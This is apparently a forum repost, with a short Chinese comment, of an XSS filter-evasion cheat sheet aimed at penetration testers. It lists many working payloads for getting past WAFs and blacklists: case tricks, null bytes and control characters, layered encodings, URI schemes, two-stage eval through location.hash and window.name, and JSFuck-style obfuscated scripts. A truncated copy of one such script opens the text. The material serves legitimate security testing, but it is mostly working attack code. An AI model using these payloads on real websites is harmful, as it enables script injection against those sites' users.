]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]]]+[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]])()
</script> 查看全部
 转自:d3adend.org/xss/ghettoBypass
挺全的,我认真了下,还可以。
_____ _          _   _          __   _______ _____   _____ _                _       _               _   
| __ \ | | | | | \ \ / / ___/ ___| / __ \ | | | | | | |
| | \/ |__ ___| |_| |_ ___ \ V /\ `--.\ `--. | / \/ |__ ___ __ _| |_ ___| |__ ___ ___| |_
| | __| '_ \ / _ \ __| __|/ _ \ / \ `--. \`--. \ | | | '_ \ / _ \/ _` | __/ __| '_ \ / _ \/ _ \ __|
| |_\ \ | | | __/ |_| |_| (_) | / /^\ |\__/ /\__/ / | \__/\ | | | __/ (_| | |_\__ \ | | | __/ __/ |_
\____/_| |_|\___|\__|\__|\___/ \/ \|____/\____/ \____/_| |_|\___|\__,_|\__|___/_| |_|\___|\___|\__|

A ghetto collection of XSS payloads that I find to be useful during penetration tests, especially when faced with WAFs or application-based black-list filtering, but feel free to disagree or shoot your AK-74 in the air.

Simple character manipulations.
Note that I use hexadecimal to represent characters that you probably can't type. For example, \x00 equals a null byte, but you'll need to encode this properly depending on the context (URL encoding \x00 = ).

HaRdc0r3 caS3 s3nsit1vITy bYpa55!
<sCrIpt>alert(1)</ScRipt>
<iMg srC=1 lAnGuAGE=VbS oNeRroR=mSgbOx(1)>

Null-byte character between HTML attribute name and equal sign (IE, Safari).
<img src='1' onerror\x00=alert(0) />

Slash character between HTML attribute name and equal sign (IE, Firefox, Chrome, Safari).
<img src='1' onerror/=alert(0) />

Vertical tab between HTML attribute name and equal sign (IE, Safari).
<img src='1' onerror\x0b=alert(0) />

Null-byte character between equal sign and JavaScript code (IE).
<img src='1' onerror=\x00alert(0) />

Null-byte character between characters of HTML attribute names (IE).
<img src='1' o\x00nerr\x00or=alert(0) />

Null-byte character before characters of HTML element names (IE).
<\x00img src='1' onerror=alert(0) />

Null-byte character after characters of HTML element names (IE, Safari).
<script\x00>alert(1)</script>

Null-byte character between characters of HTML element names (IE).
<i\x00mg src='1' onerror=alert(0) />

Use slashes instead of whitespace (IE, Firefox, Chrome, Safari).
<img/src='1'/onerror=alert(0)>

Use vertical tabs instead of whitespace (IE, Safari).
<img\x0bsrc='1'\x0bonerror=alert(0)>

Use quotes instead of whitespace in some situations (Safari).
<img src='1''onerror='alert(0)'>
<img src='1'"onerror="alert(0)">

Use null-bytes instead of whitespaces in some situations (IE).
<img src='1'\x00onerror=alert(0)>

Just don't use spaces (IE, Firefox, Chrome, Safari).
<img src='1'onerror=alert(0)>

Prefix URI schemes.
Firefox (\x09, \x0a, \x0d, \x20)
Chrome (Any character \x01 to \x20)
<iframe src="\x01javascript:alert(0)"></iframe> <!-- Example for Chrome -->

No greater-than characters needed (IE, Firefox, Chrome, Safari).
<img src='1' onerror='alert(0)' <

Extra less-than characters (IE, Firefox, Chrome, Safari).
<<script>alert(0)</script>

Backslash character between expression and opening parenthesis (IE).
<style>body{background-color:expression\(alert(1))}</style>

JavaScript Escaping
<script>document.write('<a hr\ef=j\avas\cript\:a\lert(2)>blah</a>');</script>

Encoding Galore.

HTML Attribute Encoding
<img src="1" onerror="alert(1)" />
<img src="1" onerror="&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;" />
<iframe src="javascript:alert(1)"></iframe>
<iframe src="&#x6a;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3a;&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;"></iframe>

URL Encoding
<iframe src="javascript:alert(1)"></iframe>
<iframe src="javascript:%61%6c%65%72%74%28%31%29"></iframe>

CSS Hexadecimal Encoding (IE specific examples)
<div style="x:expression(alert(1))">Joker</div>
<div style="x:\65\78\70\72\65\73\73\69\6f\6e(alert(1))">Joker</div>
<div style="x:\000065\000078\000070\000072\000065\000073\000073\000069\00006f\00006e(alert(1))">Joker</div>
<div style="x:\65\78\70\72\65\73\73\69\6f\6e\028 alert \028 1 \029 \029">Joker</div>

JavaScript (hexadecimal, octal, and unicode)
<script>document.write('<img src=1 onerror=alert(1)>');</script>
<script>document.write('\x3C\x69\x6D\x67\x20\x73\x72\x63\x3D\x31\x20\x6F\x6E\x65\x72\x72\x6F\x72\x3D\x61\x6C\x65\x72\x74\x28\x31\x29\x3E');</script>
<script>document.write('\074\151\155\147\040\163\162\143\075\061\040\157\156\145\162\162\157\162\075\141\154\145\162\164\050\061\051\076');</script>
<script>document.write('\u003C\u0069\u006D\u0067\u0020\u0073\u0072\u0063\u003D\u0031\u0020\u006F\u006E\u0065\u0072\u0072\u006F\u0072\u003D\u0061\u006C\u0065\u0072\u0074\u0028\u0031\u0029\u003E');</script>

JavaScript (Decimal char codes)
<script>document.write('<img src=1 onerror=alert(1)>');</script>
<script>document.write(String.fromCharCode(60,105,109,103,32,115,114,99,61,49,32,111,110,101,114,114,111,114,61,97,108,101,114,116,40,48,41,62));</script>

JavaScript (Unicode function and variable names)
<script>alert(123)</script>
<script>\u0061\u006C\u0065\u0072\u0074(123)</script>

Overlong UTF-8 (SiteMinder is awesome!)
< = %C0%BC = %E0%80%BC = %F0%80%80%BC
[quote] = %C0%BE = %E0%80%BE = %F0%80%80%BE
' = %C0%A7 = %E0%80%A7 = %F0%80%80%A7
" = %C0%A2 = %E0%80%A2 = %F0%80%80%A2[/quote]

<img src="1" onnerror="alert(1)">
%E0%80%BCimg%20src%3D%E0%80%A21%E0%80%A2%20onerror%3D%E0%80%A2alert(1)%E0%80%A2%E0%80%BE

UTF-7 (Missing charset?)
<img src="1" onerror="alert(1)" />
+ADw-img src=+ACI-1+ACI- onerror=+ACI-alert(1)+ACI- /+AD4-

Unicode .NET Ugliness
<script>alert(1)</script>
%uff1cscript%uff1ealert(1)%uff1c/script%uff1e

Classic ASP performs some unicode homoglyphic translations... don't ask why...
<img src="1" onerror="alert('1')">
%u3008img%20src%3D%221%22%20onerror%3D%22alert(%uFF071%uFF07)%22%u232A

Useless and/or Useful features.

HTML 5 (Not comphrensive)
<video src="http://www.w3schools.com/html5/movie.ogg" onloadedmetadata="alert(1)" />
<video src="http://www.w3schools.com/html5/movie.ogg" onloadstart="alert(1)" />

Usuage of non-existent elements (IE)
<blah style="blah:expression(alert(1))" />

CSS Comments (IE)
<div style="z:exp/[i]anything[/i]/res/[i]here[/i]/sion(alert(1))" />

Alternate ways of executing JavaScript functions
<script>window[url=0]'alert'[/url]</script>
<script>parent[url=1]'alert'[/url]</script>
<script>self[url=2]'alert'[/url]</script>
<script>top[url=3]'alert'[/url]</script>

Split up JavaScript into HTML attributes
<img src=1 alt=al lang=ert onerror=top[url=0]alt+lang[/url]>

HTML is parsed before JavaScript
<script>
var junk = '</script><script>alert(1)</script>';
</script>

HTML is parsed before CSS
<style>
body { background-image:url('http://www.blah.com/</style><script>alert(1)</script>'); }
</style>

XSS in XML documents [doctype = text/xml] (Firefox, Chrome, Safari).
<?xml version="1.0" ?>
<someElement>
<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>
</someElement>

URI Schemes
<iframe src="javascript:alert(1)"></iframe>
<iframe src="vbscript:msgbox(1)"></iframe> (IE)
<iframe src="data:text/html,<script>alert(0)</script>"></iframe> (Firefox, Chrome, Safari)
<iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></iframe> (Firefox, Chrome, Safari)

HTTP Parameter Pollution
http://target.com/something.xxx?a=val1&a=val2
ASP.NET a = val1,val2
ASP a = val1,val2
JSP a = val1
PHP a = val2

Two Stage XSS via fragment identifier (bypass length restrictions / avoid server logging)
<script>eval(location.hash.slice(1))</script>
<script>eval(location.hash)</script> (Firefox)

http://target.com/something.jsp?inject=<script>eval(location.hash.slice(1))</script>#alert(1)

Two Stage XSS via name attribute
<iframe src="http://target.com/something.jsp?inject=<script>eval(name)</script>" name="alert(1)"></iframe>

Non-alphanumeric crazyness...
<script>
$=~[];$={___:++$,$$$$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$$:({}+"")[$],$$_$:($[$]+"")[$],_$$:++$,$$$_:(!""+"")[$],$__:++$,$_$:++$,$$__:({}+"")[$],$$_:++$,$$$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+"")[$.$_$]+($._$=$.$_[$.__$])+($.$$=($.$+"")[$.__$])+((!$)+"")[$._$$]+($.__=$.$_[$.$$_])+($.$=(!""+"")[$.__$])+($._=(!""+"")[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"\""+$.$_$_+(![]+"")[$._$_]+$.$$$_+"\\"+$.__$+$.$$_+$._$_+$.__+"("+$.___+")"+"\"")())();
</script>

<script>
(+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]]]+[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]])()
</script>